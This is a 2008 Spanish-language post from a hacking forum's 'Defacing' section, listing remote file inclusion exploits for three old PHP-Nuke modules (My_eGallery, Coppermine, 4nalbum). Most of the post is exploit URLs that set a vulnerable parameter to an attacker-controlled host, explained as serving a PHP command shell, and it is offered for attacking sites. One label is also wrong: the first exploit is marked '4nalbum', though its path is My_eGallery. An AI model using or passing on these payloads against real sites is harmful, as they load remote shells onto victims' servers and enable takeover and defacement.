Nueva pagina hackcrack24: www.hackcrack24.com.ar
 
ÍndiceÍndice  PortalPortal  FAQFAQ  BuscarBuscar  RegistrarseRegistrarse  ConectarseConectarse  

hackcrack24 :: Informatica :: DefacingCompartir | 
 

 Remote File Inclusion en módulos Php

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
hacker-24
Admintrador


Cantidad de envíos: 45
Fecha de inscripción: 11/05/2008

MensajeTema: Remote File Inclusion en módulos Php   Sáb Jul 26, 2008 12:43 am
Remote File Inclusion en módulos Php

* www.digital-system.org - csuser.x[at]gmail[dot]com

########################################################################################



RFI en módulos Php


Estos son unos bugs también un poco antiguos del conocido portal de noticias php-nuke.
Los errores de remote file inclusion se encuentran en los módulos:

- "My_eGallery"
- "Coppermine"
- "4nalbum"

Y los respectivos exploits son:

*********************

Para el "4nalbum"

http://victimima/modules/My_eGallery/public/displaycategory.php?basepath=http://www.attacker.com

*********************

Para el "coppermine"

/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.attacker.com

*********************

Y para el "4nalbum"

http://victimima/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com

*********************

En donde "http://www.attacker.com" corresponde a la url de una shell de comandos cmd en php.




hacker-24
Volver arriba Ir abajo
http://hackcrack24.mejorforo.net
 

Remote File Inclusion en módulos Php

Ver el tema anterior Ver el tema siguiente Volver arriba 
Página 1 de 1.

 Temas similares

-
» Invalid ASGvis material file !!!
» VDR Remote
» Ayuda con módulos de Linux [RESUELTO]
» Unable to load the file items.txt
» File Upload Hispano

Permiso de este foro:No puedes responder a temas en este foro.
hackcrack24 :: Informatica :: Defacing-